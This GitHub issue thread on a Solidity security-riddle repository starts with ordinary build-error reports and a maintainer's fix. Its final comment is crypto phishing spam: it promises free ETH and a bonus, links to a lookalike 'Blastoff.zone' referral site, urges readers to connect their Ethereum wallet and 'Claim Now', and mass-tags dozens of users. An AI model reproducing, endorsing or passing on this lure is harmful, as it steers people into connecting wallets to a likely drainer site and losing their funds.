### ISSUE TITLE
fails to build out of the box

### ISSUE THREAD

**Issue by 0xkarmacoma** [marjon-call/SmartSecRiddles#1]
git clone the repo and forge build gives this:

```
Error (7576): Undeclared identifier.
  --> src/1_FuzzThis.sol:16:13:
   |
16 |             console.logBytes32(secretPassword);
   |             ^^^^^^^
```

I would add `import {console2} from "forge-std/console2.sol";` and do `console2.logBytes32(secretPassword);` -- do you want a PR?

**Comment by 0xkarmacoma** [comment]
There is another build failure after that:

```
Error (7576): Undeclared identifier.
  --> test/1_FuzzThis.t.sol:25:28:
   |
25 |         assertEq(solution, answer);
   |                            ^^^^^^
```

I think you want to delete the first `test_GetThisFailing_1` function with the undefined `answer`

**Comment by marjon-call** [comment]
Thanks for bringing this to my attention! I made some last second changes that caused that. It should be fixed now, let me know if you have any other issues

**Comment by TinTinWinata** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
xxiqpl, @cihanozhan, @phaye, @1vkc, @princetonbishop, @jonavon19, @joeyzone, @a-cabrales, @mmsaki, @waelsy123, @salva55, @eowynring, @jrt846, @onyedikachi-david, @nellace, @gabkov, @Subxpl0it, @rpnanhai, @cbadawi, @chengang4505, @Q-CloudWind, @DuncanDuMond, @hunterm01, @black-wind-wu, @vmish, @carb0ned0, @suxnju, @pyr3xworkshop, @abdulmalik97, @veraaaaaLiu, @AeroXi, @maoyixie, @ebnth-zorea, @xkwang91, @longhoangwkm, @OscarBrad, @uooooo, @Gajesh2007, @GeaMe, @naman1402, @haiyizxx, @N1TSUA-TATHAM-crzywrld, @coccoinomane, @prevostc, @DevPelz, @realsung, @epodak, @johnmengistu, @nico612, @federicobianucci
